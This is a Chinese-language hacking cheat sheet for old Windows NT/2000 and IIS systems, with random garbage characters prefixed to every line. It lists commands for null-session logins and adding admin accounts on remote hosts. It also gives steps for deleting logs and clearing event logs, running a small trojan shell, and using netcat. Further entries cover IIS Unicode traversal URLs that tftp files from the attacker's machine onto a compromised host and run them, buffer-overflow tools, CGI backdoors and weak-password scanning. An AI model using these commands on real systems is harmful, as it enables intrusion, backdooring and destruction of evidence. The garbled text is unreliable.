网管和黑客都必须知道的命令
&�*GX:0=/> 常用的几条NET命令:
+�M&S����� Y����mjS!H (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
r+p�j�v�_R �NT/B4'_@ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
sw�L�|Ff`$ k�\%v;3nBK (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
xF|*N<9(</ .LR>&N��_U (查看远程主机时间) net time \\IP地址
��I'b]s~u� ea>\.D-�S� (定时启动某个程序) at \\IP地址 02:18 readme.exe
B&�N&e�RAE Z`c{LYP,y" (查看共享) net view \\IP地址
#de�^~��� �-�Ep6��.v (查看netbios工作组列表) nbtstat -A IP地址
{~�I_rlo n }3y\cv0ct� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
4yv31�QG$ �4PM`�h��c (这两条把自己增加到管理员组): net user 用户名 密码 /add
`3o��P^��# �:�?�k=�Yr net localgroup Administrators 用户名 /add
ZUW>{�'[�K #��'h CohL (断开连接) net use \\IP地址\ipc$ /delete
�}?kO<)�d� iRH�QRdij� 扫尾:
R_n-&d�'PP U�/o}{,�$A del C:\winnt\system32\logfiles\*.*
Nb/�%�>3O@ i]?xM�2(�N del C:\winnt\ssytem32\config\*.evt
1��7�M�jIX z5�v�I0 N$ del C:\winnt\system32\dtclog\*.*
as!�j�0�j% �pP�p��nO� del C:\winnt\system32\*.log
Lta\�AN!�c -V�/i%_+Ze del C:\winnt\system32\*.txt
%�]oLEmn}y �5K�~�6��` del C:\winnt\*.txt
<t37DnCg�I �AB\4+ CLV del C:\winnt\*.log
n�5>N9�l�c TJ:Lz]l� > 一、netsvc.exe
{hR2�NU�m� �l�XK�ZNCL 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
,�0�~TvJS� TL��gVu��Y netsvc /list \\IP地址
p
n>`�v��� R,1�,4X�T netsvc schedule \\IP地址 /query
#?6RoFgMe� ]!:Y]VYN)\ netsvc \\IP地址 schedule /start
Ntiz-q���W q:.BY�}X�9 二、OpenTelnet.exe
'��v
� X"l JvaaB�XkS\ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�a"�aV&t�� l:f
sZ�O�4 OpenTelnet \\IP地址 用户名 密码 1 7878
ayp�}TYh* cyNLe�g+O* 然后就可以telnet到主机的7878端口,进入DOS方式下:
Q2?�qv�NZ� Q~_x%KN/` telnet IP地址 7878
4�/>={4Y9� l�e�j�{VcG 三、winshell.exe
�_s8_i6 Y� ;xwQzu%M>5 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
l�Z_��k307 (��mlc'�]F p Path (查看winshell主程序的路径信息)
fif<[�Ax�� _y���U�Fe& b reBoot (重新启动机器)
[�=��+��/� i>�2_hn_UR d shutDown (关闭机器)
g"Bv��!9*H �Kx0�dOkE� s Shell (执行后你就会看到可爱的“C:\>”)
eVXbYv=gJ@ f
�lB2�gr^ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
.SN�]�hLV5 !&[�4T#c� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
X2v�'9� �x Z]BR���M�x 四、3389登陆器,GUI方式登录远程主机的
gBu�4�`��M �e.V)�{}{V 五、elsave.exe
|e&K�g�~~C T`sM4 VWqU 事件日志清除工具
9Mx�GyGz$� ,-�)1)�R\. elsave -s \\IP地址 -l "application" -C
/$(D�>�K�U zhE7+`�`�g elsave -s \\IP地址 -l "system" -C
{IW�b:p#I] J~.k�b� �k elsave -s \\IP地址 -l "security" -C
q�a6�~N3*� pdSy�x>rJ� 执行后成功清除应用程序日志,系统日志,安全日志
*�gVv7�4;; e�z{��&Y>n 六、hbulot.exe
6bba�}��P� �L�Kc�rr�; 开启win2kserver和winxp的3389服务
@H�I5�;��z ��GWK�efH hbulot [/r]
3yN1cd"�#? B�L6�7sva; 使用/r表示安装完成后自动重起目标使设置生效。
51x�,[y+Xe ��:cTi�$n� 七、nc.exe(netcat.exe)
if>] )g2lr RMK
�U�5A7 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
X;h~�s:LM
�y1�X.Mvc 想要连接到某处: nc [-options] hostname port[s] [ports] ...
4a�-wGx�#h .Ko`DH~!,C 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
x�5ia<V>=d 2+PIZ6=�hN 参数:
1��zRO==�b �M �&�J*�I -e prog 程序重定向,一旦连接,就执行 [危险!!]
]�mS�VjF3l X��6RM���2 -g gateway source-routing hop point[s], up to 8
.� �{I7sUQ �nj
mE��>2 -G num source-routing pointer: 4, 8, 12, ...
7Y��/_/t~Y �\m&:�J�>^ -h 帮助信息
r� �DuG[" �Lrq&k40�y -i secs 延时的间隔
V
EzIWN�V� �S[����M$> -l 监听模式,用于入站连接
\�X!!(Z;6A P;��O���x| -n 指定数字的IP地址,不能用hostname
WlUE&=|Oz2 K#jm6Xh?E -o file 记录16进制的传输
)1/O_N�6�C �6��F2�}|c -p port 本地端口号
\B)��<<[ $ R�)/��w
� -r 任意指定本地及远程端口
bPNs�y@�"6 �'�,f[y:v; -s addr 本地源地址
Sc&_�6�}�K ''G��@�n* -u UDP模式
s�Zc<h]L(g $3>|R�lxYA -v 详细输出——用两个-v可得到更详细的内容
K\�G|q}E/1 M5]w���U � -w secs timeout的时间
�x�QQ6�D�� v!�2`hq��O -z 将输入输出关掉——用于扫描时
RW�5�T��}� 八、TFTPD32.EXE
�
l}J�VRU{ �8g\.1�<~� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�b>� |��oU �9 wc=B(a| http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
]l`DR�4
=� zC7;Zj*�k� 然后可以直接令文件运行:
�uJQe�ZEe t1k��D5�^ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
J{H475GqiT pi�U4%EO� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
Rzp-Q5@M�Y m9�/a!|fBE 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
52��oR^�| /Mv'fi�ch( 一、一 Xscan命令行运行参数说明:
~3�4$D],�D yDPek*#^"q 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
!�)GPI?{^5 @_;6����L� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
rS�=�6d6@ �OA�+W�$�� xscan -file <主机列表文件名> <检测项目> [其他选项]
I)c��lGMS, 7\.�5G4dr% 其中<检测项目> 含义如下:
N3,�EF1�%� �}G]]�0Oi2 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
h�<?Vz�l�� _�b+3;Dy�� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
m#uu�tomi0 7J��bN W�N -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Rc�u/ @j{O f.!cR3Xg�V -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
6�uD��Nq�q qu?D`�2��9 -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�IlH�*s�/� ���.69{GM? [其他选项] 含义如下:
&`@K/Nf$9� �b(�wi�J&t -v: 显示详细扫描进度
'i}�Q R~pe 'E9\V\b�i� -p: 跳过Ping不通的主机
Q� WOd�&=: �^�+-i7`|= -o: 跳过没有检测到开放端口的主机
Y�t�&^�i(� 1&U U�6|�X -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
